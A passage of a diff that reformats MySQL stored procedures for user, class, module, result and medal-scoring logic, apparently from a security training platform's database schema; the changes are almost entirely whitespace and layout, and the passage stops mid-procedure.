-    WHERE classId = theClassId
-      AND userRole = 'player'
-    ORDER BY userName;
+    SELECT userId, userName, userAddress FROM users
+        WHERE classId = theClassId
+        AND userRole = 'player'
+        ORDER BY userName;
 END
 
 -- $$
@@ -555,19 +529,18 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`playerUpdateClass`(IN theUserId VARCHAR(64), IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`playerUpdateClass` (IN theUserId VARCHAR(64), IN theClassId VARCHAR(64))
 BEGIN
-    COMMIT;
-    UPDATE users
-    SET classId = theClassId
+COMMIT;
+UPDATE users SET
+    classId = theClassId
     WHERE userId = theUserId
-      AND userRole = 'player';
-    COMMIT;
-    SELECT userName
-    FROM users
+    AND userRole = 'player';
+COMMIT;
+SELECT userName FROM users
     WHERE userId = theUserId
-      AND classId = theClassId
-      AND userRole = 'player';
+    AND classId = theClassId
+    AND userRole = 'player';
 END
 
 -- $$
@@ -579,13 +552,12 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`playerFindById`(IN playerId VARCHAR(64))
+CREATE PROCEDURE `core`.`playerFindById` (IN playerId VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT userName
-    FROM users
+COMMIT;
+SELECT userName FROM users
     WHERE userId = playerId
-      AND userRole = 'player';
+    AND userRole = 'player';
 END
 
 -- $$
@@ -597,14 +569,13 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`playersWithoutClass`()
+CREATE PROCEDURE `core`.`playersWithoutClass` ()
 BEGIN
     COMMIT;
-    SELECT userId, userName, userAddress
-    FROM users
-    WHERE classId is NULL
-      AND userRole = 'player'
-    ORDER BY userName;
+    SELECT userId, userName, userAddress FROM users
+        WHERE classId is NULL
+        AND userRole = 'player'
+        ORDER BY userName;
 END
 
 -- $$
@@ -616,19 +587,18 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`playerUpdateClassToNull`(IN theUserId VARCHAR(45))
+CREATE PROCEDURE `core`.`playerUpdateClassToNull` (IN theUserId VARCHAR(45))
 BEGIN
-    COMMIT;
-    UPDATE users
-    SET classId = NULL
+COMMIT;
+UPDATE users SET
+    classId = NULL
     WHERE userId = theUserId
-      AND userRole = 'player';
-    COMMIT;
-    SELECT userName
-    FROM users
+    AND userRole = 'player';
+COMMIT;
+SELECT userName FROM users
     WHERE userId = theUserId
-      AND classId IS NULL
-      AND userRole = 'player';
+    AND classId IS NULL
+    AND userRole = 'player';
 END
 -- $$
 -- DELIMITER ;
@@ -639,15 +609,14 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userUpdateRole`(IN theUserId VARCHAR(64), IN theNewRole VARCHAR(32))
+CREATE PROCEDURE `core`.`userUpdateRole` (IN theUserId VARCHAR(64), IN theNewRole VARCHAR(32))
 BEGIN
-    COMMIT;
-    UPDATE users
-    SET userRole = theNewRole
+COMMIT;
+UPDATE users SET
+    userRole = theNewRole
     WHERE userId = theUserId;
-    COMMIT;
-    SELECT userName
-    FROM users
+COMMIT;
+SELECT userName FROM users
     WHERE userId = theUserId;
 END
 -- $$
@@ -658,13 +627,12 @@ END
 -- -----------------------------------------------------
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`adminFindById`(IN adminId VARCHAR(64))
+CREATE PROCEDURE `core`.`adminFindById` (IN adminId VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT userName
-    FROM users
+COMMIT;
+SELECT userName FROM users
     WHERE userId = adminId
-      AND userRole = 'admin';
+    AND userRole = 'admin';
 END
 -- $$
 -- DELIMITER ;
@@ -674,11 +642,10 @@ END
 -- -----------------------------------------------------
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`adminGetAll`()
+CREATE PROCEDURE `core`.`adminGetAll` ()
 BEGIN
-    COMMIT;
-    SELECT userId, userName, userAddress
-    FROM users
+COMMIT;
+SELECT userId, userName, userAddress FROM users
     WHERE userRole = 'admin'
     ORDER BY userName;
 END
@@ -691,55 +658,47 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleCreate`(IN theModuleName VARCHAR(64), theModuleType VARCHAR(16),
-                                       theModuleCategory VARCHAR(64), isHardcodedKey BOOLEAN,
-                                       theModuleSolution VARCHAR(191))
+CREATE PROCEDURE `core`.`moduleCreate` (IN theModuleName VARCHAR(64), theModuleType VARCHAR(16), theModuleCategory VARCHAR(64), isHardcodedKey BOOLEAN, theModuleSolution VARCHAR(191))
 BEGIN
-    DECLARE theId VARCHAR(64);
-    DECLARE theDate DATETIME;
-    DECLARE theLangPointer VARCHAR(64);
-    DECLARE theCategoryLangPointer VARCHAR(64);
-    COMMIT;
-    SELECT NOW()
-    FROM DUAL
+DECLARE theId VARCHAR(64);
+DECLARE theDate DATETIME;
+DECLARE theLangPointer VARCHAR(64);
+DECLARE theCategoryLangPointer VARCHAR(64);
+COMMIT;
+SELECT NOW() FROM DUAL
     INTO theDate;
-    SELECT REPLACE(LOWER(theModuleName), ' ', '.')
-    FROM DUAL
-    INTO theLangPointer;
-    SELECT REPLACE(LOWER(theModuleCategory), ' ', '.')
-    FROM DUAL
-    INTO theCategoryLangPointer;
-    IF (theModuleSolution IS NULL) THEN
-        SELECT SHA2(theDate, 256)
-        FROM DUAL
+SELECT REPLACE(LOWER(theModuleName), ' ', '.') FROM DUAL
+	INTO theLangPointer;
+SELECT REPLACE(LOWER(theModuleCategory), ' ', '.') FROM DUAL
+	INTO theCategoryLangPointer;
+IF (theModuleSolution IS NULL) THEN
+    SELECT SHA2(theDate, 256) FROM DUAL
         INTO theModuleSolution;
-    END IF;
-    IF (isHardcodedKey IS NULL) THEN
-        SELECT TRUE
-        FROM DUAL
+END IF;
+IF (isHardcodedKey IS NULL) THEN
+    SELECT TRUE FROM DUAL
         INTO isHardcodedKey;
-    END IF;
-    IF (theModuleType = 'lesson' OR theModuleType = 'challenge') THEN
-        -- Increment sequence for users table
-        UPDATE sequence
-        SET currVal = currVal + 1
+END IF;
+IF (theModuleType = 'lesson' OR theModuleType = 'challenge') THEN
+    -- Increment sequence for users table
+    UPDATE sequence SET
+        currVal = currVal + 1
         WHERE tableName = 'modules';
-        COMMIT;
-        SELECT SHA(CONCAT(currVal, tableName, theDate, theModuleName))
-        FROM sequence
+    COMMIT;
+    SELECT SHA(CONCAT(currVal, tableName, theDate, theModuleName)) FROM sequence
         WHERE tableName = 'modules'
         INTO theId;
-        INSERT INTO modules (moduleId, moduleName, moduleNameLangPointer, moduleType, moduleCategory,
-                             moduleCategoryLangPointer, moduleResult, moduleHash, hardcodedKey)
-        VALUES (theId, theModuleName, theLangPointer, theModuleType, theModuleCategory, theCategoryLangPointer,
-                theModuleSolution, SHA2(CONCAT(theModuleName, theId), 256), isHardcodedKey);
-        COMMIT;
-        SELECT moduleId, moduleHash, moduleNameLangPointer, moduleCategoryLangPointer
-        FROM modules
+    INSERT INTO modules (
+        moduleId, moduleName, moduleNameLangPointer, moduleType, moduleCategory, moduleCategoryLangPointer, moduleResult, moduleHash, hardcodedKey
+    )VALUES(
+        theId, theModuleName, theLangPointer, theModuleType, theModuleCategory, theCategoryLangPointer ,theModuleSolution, SHA2(CONCAT(theModuleName, theId), 256), isHardcodedKey
+    );
+    COMMIT;
+    SELECT moduleId, moduleHash, moduleNameLangPointer, moduleCategoryLangPointer FROM modules
         WHERE moduleId = theId;
-    ELSE
-        SELECT 'ERROR: Invalid module type submited' FROM DUAL;
-    END IF;
+ELSE
+    SELECT 'ERROR: Invalid module type submited' FROM DUAL;
+END IF;
 
 END
 
@@ -753,39 +712,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`getMyModules`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`getMyModules` (IN theUserId VARCHAR(64))
 BEGIN
-    (SELECT moduleNameLangPointer,
-            moduleCategoryLangPointer,
-            moduleId,
-            finishTime,
-            moduleType,
-            scoreValue,
-            incrementalRank,
-            scored,
-            medalEarned
-     FROM modules
-              LEFT JOIN results USING (moduleId)
-     WHERE userId = theUserId
-       AND moduleStatus = 'open')
-    UNION
-    (SELECT moduleNameLangPointer,
-            moduleCategoryLangPointer,
-            moduleId,
-            null,
-            moduleType,
-            scoreValue,
-            incrementalRank,
-            null,
-            null
-     FROM modules
-     WHERE moduleId NOT IN (SELECT moduleId
-                            FROM modules
-                                     JOIN results USING (moduleId)
-                            WHERE userId = theUserId
-                              AND moduleStatus = 'open')
-       AND moduleStatus = 'open')
-    ORDER BY incrementalRank;
+(SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, finishTime, moduleType, scoreValue, incrementalRank, scored, medalEarned
+FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, null, moduleType, scoreValue, incrementalRank, null, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open')  AND moduleStatus = 'open') ORDER BY incrementalRank;
 END
 
 -- $$
@@ -798,26 +728,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleAllInfo`(IN theType VARCHAR(64), IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleAllInfo` (IN theType VARCHAR(64), IN theUserId VARCHAR(64))
 BEGIN
-    (SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, finishTime
-     FROM modules
-              LEFT JOIN results USING (moduleId)
-     WHERE userId = theUserId
-       AND moduleType = theType
-       AND moduleStatus = 'open')
-    UNION
-    (SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, null
-     FROM modules
-     WHERE moduleId NOT IN (SELECT moduleId
-                            FROM modules
-                                     JOIN results USING (moduleId)
-                            WHERE userId = theUserId
-                              AND moduleType = theType
-                              AND moduleStatus = 'open')
-       AND moduleType = theType
-       AND moduleStatus = 'open')
-    ORDER BY moduleCategoryLangPointer, moduleNameLangPointer;
+(SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, finishTime
+FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleType = theType AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategoryLangPointer, moduleId, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleType = theType AND moduleStatus = 'open') AND moduleType = theType  AND moduleStatus = 'open') ORDER BY moduleCategoryLangPointer, moduleNameLangPointer;
 END
 
 -- $$
@@ -830,26 +744,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`lessonInfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`lessonInfo` (IN theUserId VARCHAR(64))
 BEGIN
-    (SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime
-     FROM modules
-              LEFT JOIN results USING (moduleId)
-     WHERE userId = theUserId
-       AND moduleType = 'lesson'
-       AND moduleStatus = 'open')
-    UNION
-    (SELECT moduleNameLangPointer, moduleCategory, moduleId, null
-     FROM modules
-     WHERE moduleId NOT IN (SELECT moduleId
-                            FROM modules
-                                     JOIN results USING (moduleId)
-                            WHERE userId = theUserId
-                              AND moduleType = 'lesson'
-                              AND moduleStatus = 'open')
-       AND moduleType = 'lesson'
-       AND moduleStatus = 'open')
-    ORDER BY moduleNameLangPointer, moduleCategory, moduleNameLangPointer;
+(SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime
+FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleType = 'lesson' AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategory, moduleId, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleType = 'lesson' AND moduleStatus = 'open') AND moduleType = 'lesson'  AND moduleStatus = 'open') ORDER BY moduleNameLangPointer, moduleCategory, moduleNameLangPointer;
 END
 
 -- $$
@@ -862,13 +760,12 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetResult`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleGetResult` (IN theModuleId VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT moduleName, moduleResult
-    FROM modules
+COMMIT;
+SELECT moduleName, moduleResult FROM modules
     WHERE moduleId = theModuleId
-      AND moduleResult IS NOT NULL;
+    AND moduleResult IS NOT NULL;
 END
 
 -- $$
@@ -881,11 +778,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetNameLocale`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleGetNameLocale` (IN theModuleId VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT moduleNameLangPointer, moduleName
-    FROM modules
+COMMIT;
+SELECT moduleNameLangPointer, moduleName FROM modules
     WHERE moduleId = theModuleId;
 END
 
@@ -898,217 +794,165 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userUpdateResult`(IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64), IN theBefore INT,
-                                           IN theAfter INT, IN theDifficulty INT, IN givePoints BOOLEAN,
-                                           IN theAdditionalInfo LONGTEXT)
+CREATE PROCEDURE `core`.`userUpdateResult` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64), IN theBefore INT, IN theAfter INT, IN theDifficulty INT, IN givePoints BOOLEAN, IN theAdditionalInfo LONGTEXT)
 BEGIN
-    DECLARE theDate TIMESTAMP;
-    DECLARE theClassId VARCHAR(64);
-    DECLARE theMedalEarned VARCHAR(32);
-    DECLARE theBonus INT;
-    DECLARE totalScore INT;
-    DECLARE medalInfo INT; -- Used to find out if there is a medal available
-    DECLARE goldMedalInfo INT;
-    DECLARE silverMedalInfo INT;
-    DECLARE bronzeMedalInfo INT;
-    DECLARE medalRow INT;
-    COMMIT;
+DECLARE theDate TIMESTAMP;
+DECLARE theClassId VARCHAR(64);
+DECLARE theMedalEarned VARCHAR(32);
+DECLARE theBonus INT;
+DECLARE totalScore INT;
+DECLARE medalInfo INT; -- Used to find out if there is a medal available
+DECLARE goldMedalInfo INT;
+DECLARE silverMedalInfo INT;
+DECLARE bronzeMedalInfo INT;
+DECLARE medalRow INT;
+COMMIT;
 
-    SELECT NOW()
-    FROM DUAL
+SELECT NOW() FROM DUAL
     INTO theDate;
-
-    IF (givePoints) THEN
-        -- Does this Module/class combo exist in the DB?
-        SELECT classId FROM users WHERE userid = theUserId INTO theClassId;
-        IF (theClassId IS NULL) THEN
-            SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO medalRow;
-        ELSE
-            SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO medalRow;
-        END IF;
-        IF (medalRow < 1) THEN
-            INSERT INTO medals (classId, moduleId) VALUES (theClassId, theModuleId);
-        END IF;
-        COMMIT;
-
-        -- Get current bonus and decrement the bonus value
-        SELECT 0 FROM DUAL INTO totalScore;
-
-        IF (theClassId IS NULL) THEN
-            SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO theBonus;
-        ELSE
-            SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO theBonus;
-        END IF;
-        IF (theBonus > 0) THEN
-            SELECT (totalScore + theBonus)
-            FROM DUAL
-            INTO totalScore;
-            IF (theClassId IS NULL) THEN
-                UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId IS NULL;
-            ELSE
-                UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId = theClassId;
-            END IF;
-            COMMIT;
-        END IF;
-
-        -- Medal Available?
-        IF (theClassId IS NULL) THEN
-            SELECT count(moduleId)
-            FROM medals
-            WHERE moduleId = theModuleId
-              AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE)
-              AND classId IS NULL
-            INTO medalInfo;
-        ELSE
-            SELECT count(moduleId)
-            FROM medals
-            WHERE moduleId = theModuleId
-              AND classId = theClassId
-              AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE)
-            INTO medalInfo;
-        END IF;
-        COMMIT;
-
-        IF (medalInfo > 0) THEN
-            IF (theClassId IS NULL) THEN
-                SELECT count(moduleId)
-                FROM medals
-                WHERE moduleId = theModuleId
-                  AND goldMedalAvailable = TRUE
-                  AND classId IS NULL
-                INTO goldMedalInfo;
-            ELSE
-                SELECT count(moduleId)
-                FROM medals
-                WHERE moduleId = theModuleId
-                  AND classId = theClassId
-                  AND goldMedalAvailable = TRUE
-                INTO goldMedalInfo;
-            END IF;
-            IF (goldMedalInfo > 0) THEN
-                UPDATE users SET goldMedalCount = goldMedalCount + 1 WHERE userId = theUserId;
-                IF (theClassId IS NULL) THEN
-                    UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
-                ELSE
-                    UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
-                END IF;
-                COMMIT;
-            ELSE
-                IF (theClassId IS NULL) THEN
-                    SELECT count(moduleId)
-                    FROM medals
-                    WHERE moduleId = theModuleId
-                      AND silverMedalAvailable = TRUE
-                      AND classId IS NULL
-                    INTO silverMedalInfo;
-                ELSE
-                    SELECT count(moduleId)
-                    FROM medals
-                    WHERE moduleId = theModuleId
-                      AND classId = theClassId
-                      AND silverMedalAvailable = TRUE
-                    INTO silverMedalInfo;
-                END IF;
-                IF (silverMedalInfo > 0) THEN
-                    UPDATE users SET silverMedalCount = silverMedalCount + 1 WHERE userId = theUserId;
-                    IF (theClassId IS NULL) THEN
-                        UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
-                    ELSE
-                        UPDATE medals
-                        SET silverMedalAvailable = FALSE
-                        WHERE moduleId = theModuleId AND classId = theClassId;
-                    END IF;
-                    COMMIT;
-                ELSE
-                    IF (theClassId IS NULL) THEN
-                        SELECT count(moduleId)
-                        FROM medals
-                        WHERE moduleId = theModuleId
-                          AND bronzeMedalAvailable = TRUE
-                          AND classId IS NULL
-                        INTO bronzeMedalInfo;
-                    ELSE
-                        SELECT count(moduleId)
-                        FROM medals
-                        WHERE moduleId = theModuleId
-                          AND classId = theClassId
-                          AND bronzeMedalAvailable = TRUE
-                        INTO bronzeMedalInfo;
-                    END IF;
-                    IF (bronzeMedalInfo > 0) THEN
-                        UPDATE users SET bronzeMedalCount = bronzeMedalCount + 1 WHERE userId = theUserId;
-                        IF (theClassId IS NULL) THEN
-                            UPDATE medals
-                            SET bronzeMedalAvailable = FALSE
-                            WHERE moduleId = theModuleId AND classId IS NULL;
-                        ELSE
-                            UPDATE medals
-                            SET bronzeMedalAvailable = FALSE
-                            WHERE moduleId = theModuleId AND classId = theClassId;
-                        END IF;
-                        COMMIT;
-                    END IF;
-                END IF;
-            END IF;
-        END IF;
-
-        -- Get the type of Medal the user might have earned
-        IF (medalInfo <= 0) THEN
-            SELECT "none" FROM DUAL INTO theMedalEarned;
-        ELSE
-            IF (goldMedalInfo > 0) THEN
-                SELECT "gold" FROM DUAL INTO theMedalEarned;
-            ELSE
-                IF (silverMedalInfo > 0) THEN
-                    SELECT "silver" FROM DUAL INTO theMedalEarned;
-                ELSE
-                    IF (bronzeMedalInfo > 0) THEN
-                        SELECT "bronze" FROM DUAL INTO theMedalEarned;
-                    END IF;
-                END IF;
-            END IF;
-        END IF;
-
-        -- Get the Score value for the level
-        SELECT (totalScore + scoreValue)
-        FROM modules
-        WHERE moduleId = theModuleId
-        INTO totalScore;
-
-        -- Update users score
-        UPDATE users
-        SET userScore = userScore + totalScore
-        WHERE userId = theUserId;
-        COMMIT;
-
-    ELSE
-        -- Don't award points or medals, just record module as completed
-        SET totalScore = 0;
-        SELECT "none" FROM DUAL INTO theMedalEarned;
-
-    END IF;
+    
+IF (givePoints) THEN
+	-- Does this Module/class combo exist in the DB?
+	SELECT classId FROM users WHERE userid = theUserId INTO theClassId;
+	IF (theClassId IS NULL) THEN
+	  SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO medalRow;
+	ELSE
+	  SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO medalRow;
+	END IF;
+	IF (medalRow < 1) THEN
+	  INSERT INTO medals (classId, moduleId) VALUES (theClassId, theModuleId);
+	END IF;
+	COMMIT;
+
+	-- Get current bonus and decrement the bonus value
+	SELECT 0 FROM DUAL INTO totalScore;
+	
+	IF (theClassId IS NULL) THEN
+	  SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId IS NULL INTO theBonus;
+	ELSE
+	  SELECT scoreBonus FROM medals WHERE moduleId = theModuleId AND classId = theClassId INTO theBonus;
+	END IF;
+	IF (theBonus > 0) THEN
+	    SELECT (totalScore + theBonus) FROM DUAL
+	        INTO totalScore;
+	    IF (theClassId IS NULL) THEN
+	      UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId IS NULL;
+	    ELSE
+	      UPDATE medals SET scoreBonus = scoreBonus - 1 WHERE moduleId = theModuleId AND classId = theClassId;
+	    END IF;
+	    COMMIT;
+	END IF;
+	
+	-- Medal Available?
+	IF (theClassId IS NULL) THEN
+	  SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) AND classId IS NULL INTO medalInfo;
+	ELSE
+	  SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND (goldMedalAvailable = TRUE OR silverMedalAvailable = TRUE OR bronzeMedalAvailable = TRUE) INTO medalInfo;
+	END IF;
+	COMMIT;
+	
+	IF (medalInfo > 0) THEN
+	  IF (theClassId IS NULL) THEN
+	    SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND goldMedalAvailable = TRUE AND classId IS NULL INTO goldMedalInfo;
+	  ELSE
+	    SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND goldMedalAvailable = TRUE INTO goldMedalInfo;
+	  END IF;
+	  IF (goldMedalInfo > 0) THEN
+	    UPDATE users SET goldMedalCount = goldMedalCount + 1 WHERE userId = theUserId;
+	    IF (theClassId IS NULL) THEN
+	      UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
+	    ELSE
+	      UPDATE medals SET goldMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+	    END IF;
+	    COMMIT;
+	  ELSE
+	    IF (theClassId IS NULL) THEN
+	      SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND silverMedalAvailable = TRUE AND classId IS NULL INTO silverMedalInfo;
+	    ELSE
+	      SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND silverMedalAvailable = TRUE INTO silverMedalInfo;
+	    END IF;
+	    IF (silverMedalInfo > 0) THEN
+	      UPDATE users SET silverMedalCount = silverMedalCount + 1 WHERE userId = theUserId;
+	      IF (theClassId IS NULL) THEN
+	        UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
+	      ELSE
+	        UPDATE medals SET silverMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+	      END IF;
+	      COMMIT;
+	    ELSE
+	      IF (theClassId IS NULL) THEN
+	        SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND bronzeMedalAvailable = TRUE AND classId IS NULL INTO bronzeMedalInfo;
+	      ELSE
+	        SELECT count(moduleId) FROM medals WHERE moduleId = theModuleId AND classId = theClassId AND bronzeMedalAvailable = TRUE INTO bronzeMedalInfo;
+	      END IF;
+	      IF (bronzeMedalInfo > 0) THEN
+	        UPDATE users SET bronzeMedalCount = bronzeMedalCount + 1 WHERE userId = theUserId;
+	        IF (theClassId IS NULL) THEN
+	          UPDATE medals SET bronzeMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId IS NULL;
+	        ELSE
+	          UPDATE medals SET bronzeMedalAvailable = FALSE WHERE moduleId = theModuleId AND classId = theClassId;
+	        END IF;
+	        COMMIT;
+	      END IF;
+	    END IF;
+	  END IF;
+	END IF;
+
+	-- Get the type of Medal the user might have earned
+	IF (medalInfo <= 0) THEN
+		SELECT "none" FROM DUAL INTO theMedalEarned;
+	ELSE
+		IF (goldMedalInfo > 0) THEN
+			SELECT "gold" FROM DUAL INTO theMedalEarned;
+		ELSE
+			IF (silverMedalInfo > 0) THEN
+				SELECT "silver" FROM DUAL INTO theMedalEarned;
+			ELSE
+				IF (bronzeMedalInfo > 0) THEN
+					SELECT "bronze" FROM DUAL INTO theMedalEarned;
+				END IF;
+			END IF;
+		END IF;
+	END IF;
+	
+	-- Get the Score value for the level
+	SELECT (totalScore + scoreValue) FROM modules
+	    WHERE moduleId = theModuleId
+	    INTO totalScore;
+	
+	-- Update users score
+	UPDATE users SET
+	    userScore = userScore + totalScore
+	    WHERE userId = theUserId;
+	COMMIT;
+	
+ELSE
+	-- Don't award points or medals, just record module as completed
+	SET totalScore=0;
+	SELECT "none" FROM DUAL INTO theMedalEarned;
+	
+END IF;
 
 -- Update result row
-    UPDATE results
-    SET finishTime         = theDate,
-        `knowledgeBefore`  = theBefore,
-        `knowledgeAfter`   = theAfter,
-        `difficulty`       = theDifficulty,
-        `resultSubmission` = theAdditionalInfo,
-        `scored`           = totalScore,
-        `medalEarned`      = theMedalEarned
+UPDATE results SET
+    finishTime = theDate,
+    `knowledgeBefore` = theBefore,
+    `knowledgeAfter` = theAfter,
+    `difficulty`  = theDifficulty,
+    `resultSubmission` = theAdditionalInfo,
+    `scored` = totalScore,
+    `medalEarned` = theMedalEarned
     WHERE startTime IS NOT NULL
-      AND finishTime IS NULL
-      AND userId = theUserId
-      AND moduleId = theModuleId;
-    COMMIT;
-    SELECT moduleName
-    FROM modules
-             JOIN results USING (moduleId)
+    AND finishTime IS NULL
+    AND userId = theUserId
+    AND moduleId = theModuleId;
+COMMIT;
+SELECT moduleName FROM modules
+    JOIN results USING (moduleId)
     WHERE startTime IS NOT NULL
-      AND finishTime IS NOT NULL
-      AND userId = theUserId
-      AND moduleId = theModuleId;
+    AND finishTime IS NOT NULL
+    AND userId = theUserId
+    AND moduleId = theModuleId;
 END
 
 -- $$
@@ -1121,30 +965,27 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetHash`(IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleGetHash` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
 BEGIN
-    DECLARE theDate DATETIME;
-    DECLARE tempInt INT;
-    COMMIT;
-    SELECT NOW()
-    FROM DUAL
+DECLARE theDate DATETIME;
+DECLARE tempInt INT;
+COMMIT;
+SELECT NOW() FROM DUAL
     INTO theDate;
-    SELECT COUNT(*)
-    FROM results
+SELECT COUNT(*) FROM results
     WHERE userId = theUserId
-      AND moduleId = theModuleId
-      AND startTime IS NOT NULL
+    AND moduleId = theModuleId
+    AND startTime IS NOT NULL
     INTO tempInt;
-    IF (tempInt = 0) THEN
-        INSERT INTO results
-            (moduleId, userId, startTime)
-        VALUES (theModuleId, theUserId, theDate);
-        COMMIT;
-    END IF;
-    SELECT moduleHash, moduleCategory, moduleType
-    FROM modules
-    WHERE moduleId = theModuleId
-      AND moduleStatus = 'open';
+IF(tempInt = 0) THEN
+    INSERT INTO results
+        (moduleId, userId, startTime)
+        VALUES
+        (theModuleId, theUserId, theDate);
+    COMMIT;
+END IF;
+SELECT moduleHash, moduleCategory, moduleType FROM modules
+    WHERE moduleId = theModuleId AND moduleStatus = 'open';
 END
 
 -- $$
@@ -1156,11 +997,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetResultFromHash`(IN theHash VARCHAR(191))
+CREATE PROCEDURE `core`.`moduleGetResultFromHash` (IN theHash VARCHAR(191))
 BEGIN
-    COMMIT;
-    SELECT moduleResult
-    FROM modules
+COMMIT;
+SELECT moduleResult FROM modules
     WHERE moduleHash = theHash;
 END
 
@@ -1173,15 +1013,14 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`resultMessageByClass`(IN theClassId VARCHAR(64), IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`resultMessageByClass` (IN theClassId VARCHAR(64), IN theModuleId VARCHAR(64))
 BEGIN
-    COMMIT;
-    SELECT userName, resultSubmission
-    FROM results
-             JOIN users USING (userId)
-             JOIN class USING (classId)
+COMMIT;
+SELECT userName, resultSubmission FROM results
+    JOIN users USING (userId)
+    JOIN class USING (classId)
     WHERE classId = theClassId
-      AND moduleId = theModuleId;
+    AND moduleId = theModuleId;
 END
 
 -- $$
@@ -1193,15 +1032,14 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`resultMessageSet`(IN theMessage VARCHAR(128), IN theUserId VARCHAR(64),
-                                           IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`resultMessageSet` (IN theMessage VARCHAR(128), IN theUserId VARCHAR(64), IN theModuleId VARCHAR(64))
 BEGIN
-    COMMIT;
-    UPDATE results
-    SET resultSubmission = theMessage
+COMMIT;
+UPDATE results SET
